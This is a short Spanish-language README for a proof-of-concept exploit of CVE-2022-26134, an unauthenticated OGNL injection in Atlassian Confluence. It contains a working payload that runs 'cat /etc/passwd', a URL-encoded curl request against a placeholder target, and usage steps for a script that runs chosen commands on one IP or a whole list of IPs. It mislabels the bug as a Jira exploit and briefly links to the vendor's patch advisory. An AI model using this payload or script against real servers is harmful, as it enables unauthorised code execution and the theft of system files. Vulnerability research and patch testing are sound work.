
Simple PoC para el exploit de Atlassian Jira. Proporciona ejecución de código para un usuario no autorizado en un servidor.
Solo un PoC simple para el exploit de Atlassian Jira. Proporciona ejecución de código para un usuario no autorizado en un servidor.
CVE-2022-26134 - Vulnerabilidad de inyección OGNL.
Script de prueba de concepto que explota la vulnerabilidad de ejecución remota de código que afecta a Atlassian Confluence 7.18 y versiones anteriores. La vulnerabilidad de inyección OGNL permite a un usuario no autenticado ejecutar código arbitrario en una instancia de Confluence Server o Data Center.
${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("cat /etc/passwd").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
Ejemplo con el comando CURL:
curl --head -k "https://YOUR_TARGET.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D"
A continuación, el resultado del comando se verá reflejado en el parámetro X-Cmd-Response de la cabecera de la respuesta.
Directrices de mitigación de los proveedores
Sigue las recomendaciones oficiales de Atlassian: https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
Atlassian publicó las versiones 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 y 7.18.1, que contienen un parche para este problema.
1. git clone https://github.com/iveresk/cve-2022-26134.git
2. cd cve-2022-26134
3. pip install -r requirements.txt
4. Ex#1: python3 cve-2022-26134.py <IP> <COMMAND> - command is optional - default will be set as "whoami" just to check if your server is vulnerable
5. Ex#2: 4. Ex#1: python3 cve-2022-26134.py <FILE-WITH-IPs> <COMMAND>
Puedes contactarme libremente a través de Keybase para cualquier detalle.